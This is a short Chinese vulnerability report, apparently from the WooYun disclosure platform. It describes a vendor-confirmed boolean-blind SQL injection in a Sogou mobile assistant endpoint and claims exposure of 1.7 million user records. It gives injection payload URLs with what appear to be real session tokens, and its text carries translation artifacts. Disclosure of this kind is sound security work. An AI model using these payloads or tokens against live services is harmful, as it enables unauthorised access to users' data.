漏洞标题 某个搜狗站有SQL注入(涉及170W +用户数据) 相关制造商 搜狗 漏洞作者 过路人 提交时间 2016-04-22 09: 29 公共时间 2016-06-10 00: 20 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 SQL注入 漏洞详细信息 目标:搜狗移动助手Android APP 测试在以下地方发现SQL注入:(注入参数topicid,布尔盲) http://mobile.zhushou.sogou.com/android/topicdetail.html?iv=36&topicid=1637&start=0&limit=30&uid=f7e6de65c1846a70c7411b1c141591e8&vn=5.1.2&channel=zhuzhan&sogouid=5be7dec65e2011b9575759714b0d1930&stoken==IhTefovaz0ppdInTQxRlnQ&安培; CELLID=gsm_460_00_9763_3922&安培; SC=0 有效载荷: http://mobile.zhushou.sogou.com/android/topicdetail.html?iv=36&topicid=1637,1=1& start=0& limit=30& uid=f7e6de65c1846a70c7411b1c141591e8& vn=5.1.2& channel=zhuzhan& sogouid=5be7dec65e2011b9575759714b0d1930&安培; stoken==IhTefovaz0ppdInTQxRlnQ&安培; CELLID=gsm_460_00_9763_3922&安培; SC=0 http://mobile.zhushou.sogou.com/android/topicdetail.html?iv=36&topicid=1637,1=2& start=0& limit=30& uid=f7e6de65c1846a70c7411b1c141591e8& vn=5.1.2& channel=zhuzhan& sogouid=5be7dec65e2011b9575759714b0d1930&安培; stoken==IhTefovaz0ppdInTQxRlnQ&安培; CELLID=gsm_460_00_9763_3922&安培; SC=0 漏洞证明: 1,当前数据库
2,用户表,涉及170W +用户数据
修理计划: 请多指教〜 版权声明:请注明出处。居民A @乌云 parameters empty